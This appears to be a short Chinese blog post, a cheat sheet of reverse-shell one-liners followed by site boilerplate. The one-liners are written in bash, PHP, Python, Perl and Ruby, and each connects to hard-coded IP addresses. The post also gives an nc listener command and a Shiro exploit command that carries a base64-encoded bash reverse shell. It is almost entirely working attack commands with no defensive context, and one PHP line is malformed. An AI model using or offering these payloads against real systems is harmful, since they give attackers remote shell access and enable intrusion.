反弹shell语句

bash -i >& /dev/tcp/10.0.10.124/23008 0>&1
php -r '$sock=fsockopen("150.158.104.227",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.158.104.227",9997));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"150.158.104.227:9996");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("150.158.104.227","9996");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
exec 5<>/dev/tcp/150.158.104.227/9996
php- 'exec("/bin/bash -i >& /dev/tcp/150.158.104.227/9994")'
另外一边用nc去监听端口:`nc -lvvp 23008`

如果要想制作反弹shell的payload,有时需要将其转换成base64编码,然后执行exp,例如:

python2 shiro.py http://10.0.10.179:8080/ "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjEwLjEyNC8yMzAxMCAwPiYx}|{base64,-d}|{bash,-i}"
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值